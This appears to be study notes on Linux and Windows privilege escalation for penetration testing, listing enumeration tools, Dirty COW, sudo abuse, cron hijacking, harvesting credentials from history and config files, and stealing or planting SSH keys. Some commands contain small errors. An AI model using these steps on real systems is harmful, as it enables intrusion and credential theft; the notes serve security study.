6 - Privilege Escalation

# PrivEsc Checklists - develop separate checklists for Linux and Windows - resources: - https://book.hacktricks.wiki/en/index.html - https://github.com/swisskyrepo/PayloadsAllTheThings # Enumeration Scripts - Linux - linenum - https://github.com/rebootuser/LinEnum - linuxprivchecker - https://github.com/sleventyeleven/linuxprivchecker - linpeas - https://github.com/peass-ng/PEASS-ng/tree/master/linPEAS - Windows - seatbelt - https://github.com/GhostPack/Seatbelt - JAWS - https://github.com/411Hall/JAWS - powerup - https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc - winpeas - https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS - these scripts run _many_ commands known for identifying vulns and create a serious amount of noise that may trigger AV or EDR # Kernel Exploits - start by determining whether the target machine's kernel is vulnerable - Dirtycow exploit for Linux `3.9.0-73-generic` - CVE-2016-5195 # Vulnerable SW - use `dpkg -l` on Linux to list installed SW - look in `C:\Program Files` on Windows # User Privileges - once we have access to a machine, we may be able to escalate our privs to root/system by various methods - `sudo` - run `sudo -l` to list current `sudo` privs - if `(ALL : ALL) ALL` exists for current user, simply switch to root using `sudo su -` - if `(user : user) NOPASSWD: /bin/echo` exists for current user, this indicates that certain commands such as `echo` can be run as root - run `sudo -u user /bin/echo Hello World!` to run noted command as root - check GTFObins for exploits these `sudo` commands - LOLbins contains list of similar Windows apps - `SUID` - Windows token privileges # Scheduled Tasks - in both Linux and Windows, there are methods for running scripts according to a set schedule - scheduled tasks for Windows - `cron` jobs for Linux - as an attacker, take advantage of this by either: - adding as a scheduled task/cron job - trick an existing scheduled task/cron job into executing a malicious script ## Cron Jobs - see if current user has write perms over any of the jobs in: - `/etc/crontab` - `/etc/cron.d` - `/var/spool/cron/crontabs/root` # Exposed Credentials - look in files that we can read with current user for exposed creds - common examples: - config files - log files - user history files - `bash_history` in Linux - `PSReadLine` in Windows - check for password reuse # SSH Keys - if we have read access to the `.ssh` directory, look `id_rsa` files associated with priv keys - for example copy priv key from target machines;s `/root/.ssh/` directory to attacker machine then use to login ```bash #once priv key is on attacker machine vim id_rsa chmod 600 id_rsa #make perms more restrictive on attacker machine ssh root root@target_ip -i id_rsa ``` - if we have write access to the `.ssh` directory, place our own pub key in `home/user/.ssh/authorized_keys` to gain access - to generate new key pair on attacker machine, run `ssh-keygen -f output_file` to specify output file for new key pair